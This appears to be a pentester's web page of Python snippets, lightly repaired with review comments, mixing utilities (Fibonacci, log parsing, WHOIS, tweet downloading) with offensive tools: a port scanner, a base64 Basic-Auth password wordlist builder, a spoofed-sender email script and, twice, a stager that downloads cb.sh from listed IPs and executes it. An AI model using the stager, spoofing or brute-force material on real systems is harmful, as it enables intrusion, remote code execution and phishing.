Python Scripts
(Updated: 2019-09-03) -
Python Port Scanner -
Base 64 WordList -
Windows Registry -
Search Files for Regex -
SSL HTTP Server -
HTTP Server -
Email Sender -
IP List Loop -
HTTP Banner Grabber
Python Port Scanner
# Simple TCP connect() scan of localhost, ports 1-1023.
import socket as sk

for port in range(1, 1024):
    s = sk.socket(sk.AF_INET, sk.SOCK_STREAM)
    try:
        # settimeout() takes SECONDS; the original value of 1000 would have
        # stalled ~17 minutes on every filtered port.
        s.settimeout(1.0)
        # The original line had a broken string literal: '127.0.0.11,port)
        s.connect(('127.0.0.1', port))
        print('%d:OPEN' % port)
    except (sk.timeout, sk.error):
        # closed/filtered port -- move on (was a bare "except:")
        continue
    finally:
        # s.close without parentheses never actually closed the socket
        s.close()
Top -
Home
Base 64 WordList
#!/usr/bin/python
# Read passwords from pwd.1st, prefix each with "administrator:" and write
# the base64 of "user:password" to b64pwds.1st (HTTP Basic-Auth wordlist).
import base64

# "with" closes both files even on error; the original leaked both handles
# and iterated a typo'd name ("filel").
with open("pwd.1st", "r") as infile, open("b64pwds.1st", "w") as outfile:
    for line in infile:
        clear = "administrator:" + line.strip()
        # b64encode replaces the deprecated/removed base64.encodestring();
        # decode() turns the bytes result back into text for a text-mode file.
        outfile.write(base64.b64encode(clear.encode()).decode() + "\n")
Top -
Home
CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII
# Convert a Windows-registry hex string (argv[1]) to readable ASCII:
# printable bytes pass through, everything else prints as ".".
import binascii, sys, string

raw = binascii.a2b_hex(sys.argv[1])
# decode('latin-1') maps every byte value to exactly one character, so this
# also works on Python 3 where iterating bytes yields ints, not chars.
text = raw.decode("latin-1")
output = "".join(ch if ch in string.printable else "." for ch in text)
print("\n" + output)
Top -
Home
Search Files for RegEx
# Search every /tmp/*.txt file for <message>...</message> bodies.
import glob, re

# The original pattern was OCR-garbled: r'[message](.*?)>/message>'.
# Compile once outside the loop; DOTALL lets messages span lines.
MESSAGE_RE = re.compile(r'<message>(.*?)</message>', re.DOTALL)

for msg in glob.glob('/tmp/*.txt'):
    # "with" closes the handle; the original called filer.Close(), which is
    # not a file method (AttributeError) and leaked the handle.
    with open(msg, 'r') as filer:
        data = filer.read()
    message = MESSAGE_RE.findall(data)
    print("File %s contains %s" % (str(msg), message))
Top -
Home
SSL HTTP Server
# Create SSL cert (follow prompts for customization)
> openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
# Create httpserver.py
# HTTPS wrapper around SimpleHTTPServer (Python 2 module names).
import BaseHTTPServer, SimpleHTTPServer, ssl

cert = "cert.pem"
# Fixes from the original: a stray OCR line ("data,re.DOTALL)"), the server
# was assigned to "http" but used as "httpd", and the bind address string
# was missing its opening quote.
httpd = BaseHTTPServer.HTTPServer(('192.168.1.10', 443),
                                  SimpleHTTPServer.SimpleHTTPRequestHandler)
# Wrap the listening socket in TLS using the self-signed cert created above.
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert, server_side=True)
httpd.serve_forever()
Top -
Home
HTTP Server
> python -m SimpleHTTPServer 8080
Top -
Home
PYTHON EMAIL SENDER (* SENDMAIL MUST BE INSTALLED)
#!/usr/bin/python
# Send a spoofed-sender email through a local sendmail instance.
# (sendmail must be installed; starting/stopping it needs root.)
import smtplib
import os, time

os.system("/etc/init.d/sendmail start")
time.sleep(4)  # give sendmail a moment to come up

HOST = "localhost"
SUBJECT = "Email from spoofed sender"
TO = "target@you.com"
FROM = "spoof@spoof.com"
TEXT = "Message Body"

# str.join on the separator works on Python 2 and 3; the original used
# string.join(), which was removed from the string module in Python 3.
BODY = "\r\n".join((
    "From: %s" % FROM,
    "To: %s" % TO,
    "Subject: %s" % SUBJECT,
    "",
    TEXT,
))

server = smtplib.SMTP(HOST)
server.sendmail(FROM, [TO], BODY)
server.quit()

time.sleep(4)
os.system("/etc/init.d/sendmail stop")
LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
# Try each host in "urls" in turn, download http://host:80/cb.sh,
# save it to /tmp and execute it. Stops at the first successful download.
import urllib2, os

urls = ["1.1.1.1", "2.2.2.2"]
port = "80"
payload = "cb.sh"

for url in urls:
    u = "http://%s:%s/%s" % (url, port, payload)
    try:
        r = urllib2.urlopen(u)
        wfile = open("/tmp/cb.sh", "wb")
        wfile.write(r.read())
        wfile.close()
        break
    except urllib2.URLError:
        # host unreachable or file missing -- try the next IP
        # (narrowed from a bare "except:", which also swallowed Ctrl-C)
        continue

if os.path.exists("/tmp/cb.sh"):
    os.system("chmod 700 /tmp/cb.sh")
    os.system("/tmp/cb.sh")
Top -
Home
LOOP THROUGH IP LIST, DOWNLOAD FILE OVER HTTP AND EXECUTE
#!/usr/bin/python
# Loop through an IP list, download cb.sh over HTTP from the first host
# that answers, then run it from /tmp.
import urllib2, os

urls = ["1.1.1.1", "2.2.2.2"]
port = "80"
payload = "cb.sh"

for url in urls:
    u = "http://%s:%s/%s" % (url, port, payload)
    try:
        r = urllib2.urlopen(u)
        # "with" guarantees the handle closes even if write() fails
        with open("/tmp/cb.sh", "wb") as wfile:
            wfile.write(r.read())
        break
    except urllib2.URLError:
        continue  # host down or 404 -- try the next one (was a bare except)

if os.path.exists("/tmp/cb.sh"):
    os.system("chmod 700 /tmp/cb.sh")
    os.system("/tmp/cb.sh")
Top -
Home
PYTHON HTTP BANNER GRABBER (* TAKES AN IP RANGE, PORT, AND PACKET DELAY)
#!/usr/bin/python
# HTTP banner grabber: expands a last-octet IPv4 range (e.g. 192.168.1.1-25),
# requests each host on the given port, and prints each Server header.
import urllib2, sys, time
from optparse import OptionParser

parser = OptionParser()
parser.add_option("-t", dest="iprange", help="target IP range, i.e. 192.168.1.1-25")
parser.add_option("-p", dest="port", default="80", help="port, default=80")
parser.add_option("-d", dest="delay", default=".5", help="delay (in seconds), default=.5 seconds")
(opts, args) = parser.parse_args()

if opts.iprange is None:
    parser.error("you must supply an IP range")

ips = []
headers = {}
octets = opts.iprange.split('.')      # original had a broken quote: split('.)
start, stop = octets[3].split('-')    # "1-25" -> start="1", stop="25"
for i in range(int(start), int(stop) + 1):
    # original format string was garbled ("%s.%s.%s%d" with no quotes)
    ips.append('%s.%s.%s.%d' % (octets[0], octets[1], octets[2], i))

print('\nScanning IPs: %s\n' % (ips,))

for ip in ips:
    try:
        response = urllib2.urlopen('http://%s:%s' % (ip, opts.port))
        headers[ip] = dict(response.info())  # header dict on success
    except Exception as e:
        headers[ip] = "Error: " + str(e)     # error string on failure
    time.sleep(float(opts.delay))            # be polite between requests

for header in headers:
    try:
        # dict value -> show the Server header ('server1' was an OCR typo)
        print('%s : %s' % (header, headers[header].get('server')))
    except AttributeError:
        # error-string value has no .get(); print it as-is
        print('%s : %s' % (header, headers[header]))
Top -
Home
Monitor Nginx Access Log IPs
# Count requests per client IP (first whitespace-separated field of each
# line) in the nginx access log.
ips = {}
# "with" closes the log; the original left the handle open and read the
# whole file into memory with readlines() -- iterate the file instead.
with open("/var/log/nginx/access.log", "r") as fh:
    for line in fh:
        ip = line.split(" ")[0]
        # crude sanity check: dotted-quad IPv4 strings are 7-15 chars long
        if 6 < len(ip) <= 15:
            ips[ip] = ips.get(ip, 0) + 1
print(ips)
IP WHOIS
import json
from random import randint
import socket
import struct
import sys
from docopt import docopt
import ipcalc
from ipwhois import IPWhois
import gevent
from pyelasticsearch import ElasticSearch
from pyelasticsearch.exceptions import \
ElasticHttpError, ElasticHttpNotFoundError
import requests
def ip2long(ip):
    """Convert an IPv4 address in dotted-quad string format to an integer.

    The original's doc lines were bare statements (the triple quotes were
    lost), which made the function a syntax error as written.

    :param str ip: IPv4 address
    :return: IPv4 address as an integer
    :rtype: int
    """
    packed_ip = socket.inet_aton(ip)
    # "!L" = network byte order, unsigned 32-bit
    return struct.unpack("!L", packed_ip)[0]
def get_next_ip(ip_address):
    """Return the next sequential IPv4 address, or None at the top of space.

    :param str ip_address: IPv4 address
    :return: next IPv4 address, or None after 255.255.255.255
    :rtype: str or None

    >>> get_next_ip('0.0.0.0')
    '0.0.0.1'
    >>> get_next_ip('24.24.24.24')
    '24.24.24.25'
    >>> get_next_ip('24.24.255.255')
    '24.25.0.0'
    >>> get_next_ip('255.255.255.255') is None
    True
    """
    assert ip_address.count('.') == 3, \
        'Must be an IPv4 address in str representation'
    if ip_address == '255.255.255.255':
        return None
    try:
        return socket.inet_ntoa(struct.pack('!L', ip2long(ip_address) + 1))
    except Exception:
        # "except Exception, error" is Python-2-only syntax; a bare "raise"
        # also preserves the original traceback.
        print('Unable to get next IP for %s' % ip_address)
        raise
def get_netrange_end(asn_cidr):
    """Return the last usable IPv4 address of the given CIDR block.

    :param str asn_cidr: ASN CIDR (e.g. '24.0.0.0/8')
    :return: IPv4 address of the last IP in the netrange
    :rtype: str
    """
    try:
        # first host + size - 2 lands on the last usable address
        last_in_netrange = \
            ip2long(str(ipcalc.Network(asn_cidr).host_first())) + \
            ipcalc.Network(asn_cidr).size() - 2
    except ValueError:
        # "except ValueError, error" was Python-2-only syntax
        print('Issue calculating size of %s network' % asn_cidr)
        raise
    return socket.inet_ntoa(struct.pack('!L', last_in_netrange))
def get_next_undefined_address(ip):
    """Get the next non-reserved IPv4 address if the given address is inside
    a reserved/special-use network; return the address itself otherwise.

    :param str ip: IPv4 address
    :return: next non-reserved IPv4 address, or None when ip is invalid
    :rtype: str or None

    >>> get_next_undefined_address('0.0.0.0')
    '1.0.0.0'
    >>> get_next_undefined_address('24.24.24.24')
    '24.24.24.24'
    >>> get_next_undefined_address('127.0.0.1')
    '128.0.0.0'
    >>> get_next_undefined_address('255.255.255.256') is None
    True
    """
    try:
        # Should weed out many invalid IP addresses
        ipcalc.Network(ip)
    except ValueError:
        # py3 syntax; the bound name was unused anyway
        return None
    # Special-use / reserved IPv4 blocks (cf. RFC 5735)
    defined_networks = (
        '0.0.0.0/8',
        '10.0.0.0/8',
        '127.0.0.0/8',
        '169.254.0.0/16',
        '192.0.0.0/24',
        '192.0.2.0/24',
        '192.88.99.0/24',
        '192.168.0.0/16',
        '198.18.0.0/15',
        '198.51.100.0/24',
        '203.0.113.0/24',
        '224.0.0.0/4',
        '240.0.0.0/4',
        '255.255.255.255/32',
    )
    for network_cidr in defined_networks:
        if ip in ipcalc.Network(network_cidr):
            # skip to the first address past the reserved block
            return get_next_ip(get_netrange_end(network_cidr))
    return ip
def break_up_ipv4_address_space(num_threads=8):
    """Split the IPv4 address space into num_threads contiguous ranges of
    whole /8s, returned as (first_ip, last_ip) string pairs.

    :param int num_threads: number of ranges (should divide 256 evenly)
    :return: list of (start, end) dotted-quad pairs
    :rtype: list

    >>> break_up_ipv4_address_space() == \
    [('0.0.0.0', '31.255.255.255'), ('32.0.0.0', '63.255.255.255'),\
    ('64.0.0.0', '95.255.255.255'), ('96.0.0.0', '127.255.255.255'),\
    ('128.0.0.0', '159.255.255.255'), ('160.0.0.0', '191.255.255.255'),\
    ('192.0.0.0', '223.255.255.255'), ('224.0.0.0', '255.255.255.255')]
    True
    """
    ranges = []
    # // keeps this an int on Python 3; plain / yields a float there and
    # breaks the '%d' formatting below.
    multiplier = 256 // num_threads
    for marker in range(0, num_threads):
        starting_class_a = marker * multiplier
        ending_class_a = ((marker + 1) * multiplier) - 1
        ranges.append(('%d.0.0.0' % starting_class_a,
                       '%d.255.255.255' % ending_class_a))
    return ranges
def get_netranges(starting_ip='1.0.0.0',
                  last_ip='2.0.0.0',
                  elastic_search_url='http://127.0.0.1:9200/',
                  index_name='netblocks',
                  doc_name='netblock', sleep_min=1, sleep_max=5):
    """WHOIS every netblock between starting_ip and last_ip and index each
    record into Elasticsearch, skipping reserved address space and sleeping
    a random interval between lookups.

    :param str starting_ip: first IPv4 address to look up
    :param str last_ip: stop once the current address passes this one
    :param str elastic_search_url: Elasticsearch endpoint URL
    :param str index_name: index to write records to
    :param str doc_name: document type for the records
    :param int sleep_min: lower bound (seconds) of the inter-query sleep
    :param int sleep_max: upper bound (seconds) of the inter-query sleep
    """
    connection = ElasticSearch(elastic_search_url)
    current_ip = starting_ip
    while True:
        # See if we've finished the range of work
        if ip2long(current_ip) > ip2long(last_ip):
            return
        current_ip = get_next_undefined_address(current_ip)
        if current_ip is None:  # No more undefined ip addresses
            return
        print(current_ip)
        try:
            whois_resp = IPWhois(current_ip).lookup_rws()
        except Exception as error:
            # A message like "STDERR: getaddrinfo(whois.apnic.net): Name or
            # service not known" can appear; print it and move on to the
            # next IP address.
            print(type(error), error)
            current_ip = get_next_ip(current_ip)
            if current_ip is None:
                return  # No more undefined ip addresses
            gevent.sleep(randint(sleep_min, sleep_max))
            continue
        # Prefer the ASN CIDR when it looks like a real IPv4 CIDR ...
        if 'asn_cidr' in whois_resp and \
                whois_resp['asn_cidr'] is not None and \
                whois_resp['asn_cidr'].count('.') == 3:
            last_netrange_ip = get_netrange_end(whois_resp['asn_cidr'])
        else:
            # ... otherwise fall back to the "range" field of the first net.
            try:
                last_netrange_ip = \
                    whois_resp['nets'][0]['range'].split('-')[-1].strip()
                assert last_netrange_ip.count('.') == 3
            except Exception:
                # Narrowed from a bare "except:" so KeyboardInterrupt and
                # SystemExit still propagate.
                print('Missing ASN CIDR in whois resp: %s' % whois_resp)
                current_ip = get_next_ip(current_ip)
                if current_ip is None:
                    return  # No more undefined ip addresses
                gevent.sleep(randint(sleep_min, sleep_max))
                continue
        assert last_netrange_ip is not None and \
            last_netrange_ip.count('.') == 3, \
            'Unable to find last netrange ip for %s: %s' % (current_ip,
                                                            whois_resp)
        # Save current_ip and whois_resp
        entry = {
            'netblock_start': current_ip,
            'netblock_end': last_netrange_ip,
            'block_size': ip2long(last_netrange_ip) - ip2long(current_ip) + 1,
            'whois': json.dumps(whois_resp),
        }
        keys = ('cidr', 'name', 'handle', 'range', 'description',
                'country', 'state', 'city', 'address', 'postal_code',
                'abuse_emails', 'tech_emails', 'misc_emails', 'created',
                'updated')
        # Copy each whois field (stringified) when present and truthy.
        for _key in keys:
            entry[_key] = str(whois_resp['nets'][0][_key]) \
                if _key in whois_resp['nets'][0] and \
                whois_resp['nets'][0][_key] else None
            # underscore city names so they aggregate as single terms
            if _key == 'city' and entry[_key] and ' ' in entry[_key]:
                entry[_key] = entry[_key].replace(' ', '_')
        try:
            connection.index(index_name, doc_name, entry)
        except ElasticHttpError:
            # "except ElasticHttpError, error" was Python-2-only syntax
            print('At %s. Unable to save record: %s' % (current_ip, entry))
            raise
        # Jump past the netblock we just recorded.
        current_ip = get_next_ip(last_netrange_ip)
        if current_ip is None:
            return  # No more undefined ip addresses
        gevent.sleep(randint(sleep_min, sleep_max))
def stats(elastic_search_url, index_name, doc_name):
    """Print the top netblock locations by country and by city, ranked by
    the total number of IP addresses covered.

    :param str elastic_search_url: Elasticsearch endpoint URL
    :param str index_name: index to aggregate over
    :param str doc_name: document type (unused; kept for CLI symmetry)
    """
    fields = ('country', 'city')
    url = '%s/%s/_search?fields=aggregations' % (elastic_search_url, index_name)
    for field in fields:
        # Terms aggregation: sum of block_size per distinct value, biggest first
        data = {
            "aggs": {
                field: {
                    "terms": {
                        "field": field,
                        "order": {"total_ips": "desc"}
                    },
                    "aggs": {
                        "total_ips": {"sum": {"field": "block_size"}}
                    }
                }
            }
        }
        resp = requests.get(url, data=json.dumps(data))
        assert resp.status_code == 200, \
            'Did not get HTTP 200 back: %s' % resp.status_code
        _stats = json.loads(resp.content)["aggregations"][field]["buckets"]
        _stats = {stat['key']: int(stat['total_ips']['value'])
                  for stat in _stats}
        print('Top 10 netblock locations by %s' % field)
        for _key in sorted(_stats, key=_stats.get, reverse=True):
            # Python-2 "print a, b" statements converted to the function form
            print("{:14,d}".format(_stats[_key]), _key.replace('_', ' '))
        print('')
def main(argv):
    """Dispatch the docopt CLI: collect netblocks, print stats, or run the
    doctests.

    :param list argv: command line arguments (sys.argv[1:])
    """
    opt = docopt(__doc__, argv)
    if opt['collect']:
        sleep_min = int(opt['--sleep_min']) \
            if opt['--sleep_min'] is not None else randint(1, 5)
        sleep_max = int(opt['--sleep_max']) \
            if opt['--sleep_max'] is not None else randint(1, 5)
        num_threads = int(opt['--threads'])
        if sleep_min > sleep_max:
            # keep the randint() bounds ordered
            sleep_min, sleep_max = sleep_max, sleep_min
        # one greenlet per slice of the IPv4 space
        # ("starting_id" was a misleading name for an IP address)
        threads = [gevent.spawn(get_netranges, starting_ip, ending_ip,
                                opt['<elastic_search_url>'], opt['<index_name>'],
                                opt['<doc_name>'], sleep_min, sleep_max)
                   for starting_ip, ending_ip in
                   break_up_ipv4_address_space(num_threads)]
        gevent.joinall(threads)
    if opt['stats']:
        stats(opt['<elastic_search_url>'],
              opt['<index_name>'],
              opt['<doc_name>'])
    if opt['test']:
        import doctest
        doctest.testmod()
if __name__ == "__main__":
    try:
        main(sys.argv[1:])
    except KeyboardInterrupt:
        # Ctrl-C during a long scan exits quietly instead of dumping a traceback
        pass
Download Tweets
#!/usr/bin/env python
# encoding: utf-8
import tweepy  # https://github.com/tweepy/tweepy
import csv
# Twitter API credentials -- fill these in from your Twitter developer app;
# get_all_tweets() below cannot authenticate while they are empty.
consumer_key = ""
consumer_secret = ""
access_key = ""
access_secret = ""
def get_all_tweets(screen_name):
    """Download a user's recent tweets and write them to
    <screen_name>_tweets.csv with columns id, created_at, text.

    Twitter only allows access to a user's most recent ~3240 tweets with
    this (user_timeline) method.

    :param str screen_name: Twitter handle to download
    """
    # authorize twitter, initialize tweepy
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_key, access_secret)
    api = tweepy.API(auth)

    alltweets = []
    # initial request for the most recent tweets (200 is the maximum count)
    new_tweets = api.user_timeline(screen_name=screen_name, count=200)
    alltweets.extend(new_tweets)

    # Keep paging until a request comes back empty. Computing "oldest"
    # inside the loop also fixes the original's IndexError on accounts
    # with zero tweets (it indexed alltweets[-1] unconditionally).
    while new_tweets:
        # max_id = oldest id minus one prevents re-downloading duplicates
        oldest = alltweets[-1].id - 1
        print("getting tweets before %s" % oldest)
        new_tweets = api.user_timeline(screen_name=screen_name, count=200,
                                       max_id=oldest)
        alltweets.extend(new_tweets)
        print("...%s tweets downloaded so far" % len(alltweets))

    # 2D array that will populate the csv
    outtweets = [[tweet.id_str, tweet.created_at, tweet.text.encode("utf-8")]
                 for tweet in alltweets]

    # "with" closes the file even if the writer raises
    with open('%s_tweets.csv' % screen_name, 'wb') as f:
        writer = csv.writer(f)
        writer.writerow(["id", "created_at", "text"])
        writer.writerows(outtweets)
if __name__ == '__main__':
    # pass in the username of the account whose tweets you want to download
    get_all_tweets("thealicesmith")
Current Date and Time
# Show several ways to print the current date and time.
# (Original used Python-2-only print statements; the function form below
# produces the same output and also parses on Python 3.)
import datetime

now = datetime.datetime.now()

print("")
print("Current date and time using str method of datetime object:")
print(str(now))

print("")
print("Current date and time using instance attributes:")
print("Current year: %d" % now.year)
print("Current month: %d" % now.month)
print("Current day: %d" % now.day)
print("Current hour: %d" % now.hour)
print("Current minute: %d" % now.minute)
print("Current second: %d" % now.second)
print("Current microsecond: %d" % now.microsecond)

print("")
print("Current date and time using strftime:")
print(now.strftime("%Y-%m-%d %H:%M"))
Check Log File
#!/usr/bin/env python
# Print each syslog line split into fields, then a (month, day, time,
# process) tuple -- index 4 deliberately skips the hostname at index 3.
with open("/var/log/syslog", "r") as logfile:
    for line in logfile:
        fields = line.split()
        print(fields)
        # guard short/blank lines (the original raised IndexError on them),
        # and avoid shadowing the builtin "list" as the original did
        if len(fields) >= 5:
            selected = fields[0], fields[1], fields[2], fields[4]
            print(selected)
All WHOIS
# Uses pyWhois to parse WHOIS database for entered domain
# Uses pywhois to query the WHOIS database for the entered domain.
import sys  # the original used sys.argv without ever importing sys
import whois

# Take the domain from argv if given (the original indexed argv[1]
# unconditionally and crashed when run without an argument).
data = sys.argv[1] if len(sys.argv) > 1 else ""
if len(data) < 5:
    while True:
        try:
            data = input("Enter a domain: ")
        except ValueError:
            print("Please, enter a domain name: ")
            continue
        else:
            break
print("Checking WHOIS Information for ", data, " ...")
# Query pywhois for information
w = whois.whois(data)
# The record fields live on the query result, not the module --
# whois.domain_name was an AttributeError in the original.
print("Domain Name: ", w.domain_name)
print("Expiration Date: ", w.expiration_date)
# Print important information
#
#
# import whois
# w = whois.whois('yourmom.com')
# print w
# Output will look like
# creation_date: [datetime.datetime(2012, 9, 15, 0, 0), '15 Sep 2012 20:41:00']
# domain_name: ['YOURMOM.COM', 'yourmom.com']
# updated_date: 2013-08-20 00:00:00
# whois_server: whois.enom.com
# print w.expiration_date
# print w.text
Fibonacci
# Display the Fibonacci sequence up to the n-th term, where n is set below.
# change this value for a different result
nterms = 100
# uncomment to take input from the user
#nterms = int(input("How many terms? "))

# validate the requested number of terms before printing anything
if nterms <= 0:
    print("Please enter a positive integer")
elif nterms == 1:
    print("Fibonacci sequence up to", nterms, ":")
    print(0)
else:
    print("Fibonacci sequence up to", nterms, ":")
    # tuple assignment advances the pair (F(k), F(k+1)) each iteration
    a, b = 0, 1
    for _ in range(nterms):
        print(a, end=' , ')
        a, b = b, a + b
How to Sleep (Sample)
# How to sleep for 5 seconds in python:
import time
time.sleep(5)  # blocks the calling thread for 5 seconds
# How to sleep for 0.5 seconds in python:
import time  # re-importing is a cached no-op; shown so each example stands alone
time.sleep(0.5)  # sleep() accepts a float for sub-second delays
Search Twitter
# Fetch a user's recent tweets from the unauthenticated Twitter REST API v1.
# NOTE(review): api.twitter.com/1/ was retired in 2013 and now returns an
# error -- kept for reference; use the authenticated v1.1+ API instead.
import urllib2
import json

screen_name = "wordpress"
url = "http://api.twitter.com/1/statuses/user_timeline.json?screen_name=" + screen_name
data = json.load(urllib2.urlopen(url))
# Python-2 print statements converted to the function form
print(len(data), "tweets")
for tweet in data:
    print(tweet['text'])